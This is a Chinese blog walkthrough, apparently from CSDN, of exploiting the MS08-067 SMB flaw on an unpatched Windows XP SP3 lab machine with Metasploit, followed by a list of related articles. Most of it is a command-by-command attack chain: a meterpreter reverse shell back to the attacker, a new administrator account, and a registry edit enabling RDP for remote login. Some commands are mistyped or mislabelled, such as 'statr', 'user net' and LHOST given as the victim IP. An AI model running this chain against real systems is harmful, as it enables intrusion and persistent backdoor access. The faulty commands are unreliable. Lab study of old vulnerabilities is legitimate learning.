WIN xp sp3 系统上Ms08_067_netapi漏洞利用

最新推荐文章于 2025-06-26 20:42:54 发布
原创 最新推荐文章于 2025-06-26 20:42:54 发布 · 8.6k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #漏洞利用 #MS08067

本文介绍如何利用MS08-067漏洞获得目标系统的高权限,并通过建立新用户及提权实现远程连接。适用于无补丁的WINxpsp3系统。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限;

1:准备工作:WINxp sp3 系统(无补丁)
下载地址:
http://blog.youkuaiyun.com/sql_injection/article/details/47683419
攻击kali ip:192.168.243.133
靶机 ip :192.168.243.136
2:准备工作完成后开启kali打开终端metasploit中的msfconsole框架
命令 :
msfconsole
打开metasploit之前需要连接上postgresql:
service postgresql statr
3:寻找和加载Ms08_067模块
(1):使用搜索命令搜索此模块:
search ms08_067_netapi
(2):应用搜索到的模块地址:
use exploit/windows/smb/ms08_067_netapi
4:我们来加载一枚payload:
set payload windows/meterpreter/reverse_tcp

此时加载完毕可以查看需要设置的参数:
show options

然后如下图所示:
5:上图所示的 RHOST 为靶机的 ip, LHOST为kali 的ip:
set RHOST 被攻击者ip
set LHOST 被攻击者ip
然后进行攻击:
exploit


6:出现meterpreter命令后说明攻击成功,此时输入shell进入靶机cmd界面对其建立新的用户,并且提权:

(1):建立用户:
user net 用户名 密码 /add

(2):提权:
net localgroup administrators wmc /add




7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
(1):查看是否打开:
netstat -na



(2):显然并没有,那么我们就给它打开: 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
可以看到,3389端口已经打开。

8:接下来就用自己本机系统进行远程连接搞事情就可以了:
(1)打开cmd输入远程连接命令:
(2)此时计算机名输入靶机的ip地址就可以了,之后输入你自己建立的用户名和密码:

(3):就成功进入了:

此时完成所有操作。
总结:
此时靶机上也有了你创建的新用户。
要使用没有补丁的靶机,不然攻击时会失败。


神林丶
关注
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
李同學的安全圈
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
Windows xp Ms08067漏洞复现
hintll的博客
11-18 4189
准备工作: 虚拟机 kali Windows xp sp3中文版 先ping双方的ip,以确保双方的网络可以互通 nmap扫描Windows 命令: cd /usr/share/nmap/scripts nmap --script=vuln 192.168.XXX.XXX 扫描后有漏洞ms08067 用mts进行攻击 先找漏洞利用: search 08_067 运用漏洞: use exploit/windowsexploit/windows/smb/ms08_067_netapi 看参数: show op
MS08-067源码分析
04-04
MS08-067漏洞源码,用于分析研究,适用于window2003XPWin7
MS08_067_netapi漏洞复现
weixin_45418565的博客
05-02 964
MS08_067_netapi漏洞复现 winxp的ip地址为192.168.0.101 kali的ip地址为192.168.0.105 确保两台主机能ping通 接着我们使用kali中自带的msf进行攻击 开启postgresql数据库 service postgresql start 启动msf msfconsole 我们利用msf的数据库搜索相应winxp漏洞 search...
漏洞复现:MS08_067
最新发布
2501_90131820的博客
06-26 923
摘要:本文详细记录了MS08_067漏洞(CVE-2008-4250)的复现过程,该漏洞影响Windows 2000/XP/Server 2003系统,可通过SMB服务的445端口进行远程代码执行。复现使用Kali Linux的Metasploit框架,针对Windows Server 2003中文版需手动添加攻击模块参数。通过nmap扫描确认445端口开放后,设置攻击参数并利用漏洞成功获取系统shell权限,验证了该漏洞的危害性。文中还提及攻击过程中靶机崩溃的应对方法,以及通过添加用户实现远程连接的完整
Office 2003 sp3(CVE-2012-0158)漏洞分析报告
w_g3366的博客
09-07 876
文章目录Office 2003 sp3(CVE-2012-0158)漏洞分析报告1.漏洞背景2.漏洞成因2.1 触发漏洞2.2 定位漏洞模块2.3 定位漏洞函数2.4 分析漏洞成因2.5 总结3.利用过程3.1 分析和设计利用漏洞的ShellCode的结构3.2 寻找跳板指令jmp esp3.3 编写ShellCode,注入ShellCode4.构造Exp5.结语 Office 2003 sp3(...
网络安全利用MS-08-067漏洞渗透WindowsXP过程
qq_61415450的博客
03-25 1291
网络安全
利用ms08-067漏洞远程控制Windowsxp
xyx107的博客
03-03 1万+
1、查找ms08-067:2、使用:3、选择payload:(开始我用的windows/shell/...和windows/meterpreter/reverse_tpc有区别)4、查看options(yes为必填部分):5、输入RHOST(目标靶机)IP和LHOST的IP:6、查看适合的系统类型(简体中文sp3,编号34):7、可选target 0(自动)或自己选择:8、exploit(图中IP...
利用metasploit通过ms_08_067_netapi漏洞渗透winXp
cool_jia的博客
12-19 2728
攻击主机为装了metasploit的win10 目标主机为虚拟机中的winxp专业版sp3(需要关闭防火墙) 虚拟机中系统采用的桥接方式 1.启动metasploit 2.使用ms_08_067_netapi渗透模块,并查看信息 3.查看可用的攻击载荷 4.选择攻击载荷generic/shell_bind_tcp(此处就是要获取对方的控制台),查看有哪些参数要设置 5
Windows漏洞MS08-067
Nanyeer的博客
03-21 1826
MS08-067漏洞(远程命令执行漏洞)的演示
kali linux攻击机及windowsXp/Metasploit_linux靶机安装及在此基础上的蜜罐系统搭建(上)
微光·火炬
06-20 7353
一、创建虚拟机Linux攻击机步骤: 1.下载安装好Vmware 2.创建新虚拟机——Linux攻击机       (1)点击 “ 创建新虚拟机”,出现如下视图,选择“稍后安装操作系统”,下一步 (2)选择Linux操作系统,版本选为“其他Linux3x内核64位”,下一步——>位置自选,下一步       (3)选择磁盘容量,尽量大一点
ms08_067补丁,windowsxp补丁
04-26
ms08067补丁,最近的好多病毒、木马,打过这个补丁后就可以杀了。比如:jwgkvsq.vmx
Kali渗透测试——利用metasploit攻击靶机WinXP SP1
dif90304的博客
05-19 1057
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配置WinXP SP1靶机的IP地址 执行漏洞利用漏洞利用:meterpreter> ...
Metasploit 攻击winXP
Epsilon
01-06 9012
本次实验会用到以下资源: Kali linux 镜像 windows XP SP2 镜像 进入kali linux进行渗透: # msfconsole msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST TARGETIP msf exploit(ms08_
Windows XP SP3(MS08-067漏洞复现及利用)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-01 2306
把以前做的实验和写在有道云里的笔记整理下,放到优快云上 一、实验环境 靶机:Windows XP SP3 专业版(关闭Windows自带的防火墙!!!) 攻击机:Kali Linux 2020 靶机IP : 192.168.204.131 攻击机IP:192.168.204.128 二、漏洞利用 msf5 > search ms08-067 Matching Modules ================ # Name D
MS08067/MS10061漏洞靶机环境搭建总结
热门推荐
SQL_injection的专栏
08-15 1万+
MS08067/MS10061漏洞靶机环境搭建总结
用metasploit来exploit虚拟机XPSP3ms08_067
天元喜羊羊的博客
04-11 4076
看到MS08-067: VULNERABLE,说明有漏洞 exploit失败,不知道原因。书里写着这样几句话:“这暗示我们或许能够对这台主机进行攻击。攻击是否成功取决于目标主机的操作系统版本、安装的服务包版本以及语言类型,同时还依赖于是否成功地绕过了数据执行保护DEP。” 我想可能没有成功绕过DEP吧。
Metasploit利用MS08-067漏洞
test
11-20 9592
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS08-067.ms08_...
经典漏洞MS08_067如何利用
乌云__SS的博客
05-20 5330
1.首先需要下载kali安装到VMware中,如何安装参考我之前的文本,要想复现该漏洞需要一个xp系统,防火墙关闭。这里xp系统的安装就不多做介绍了。 2.下载好kali后需要验证网络是否通畅,出现以下界面则网络通畅 ping www.baidu.com 若网络不通畅则检查自己的虚拟机设置 3.打开msfconsole工具 msfconsole 4.查找ms08_067...
如何使用Metasploit在Kali Linux环境中利用MS08_067漏洞进行渗透测试?
11-09
利用MS08_067漏洞进行渗透测试,首先需要确保你的Kali Linux环境已经搭建好,并安装了Metasploit框架。以下是详细步骤: 参考资源链接:[2022太原理工大学网络攻防实验:MS08_067漏洞与渗透测试]...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值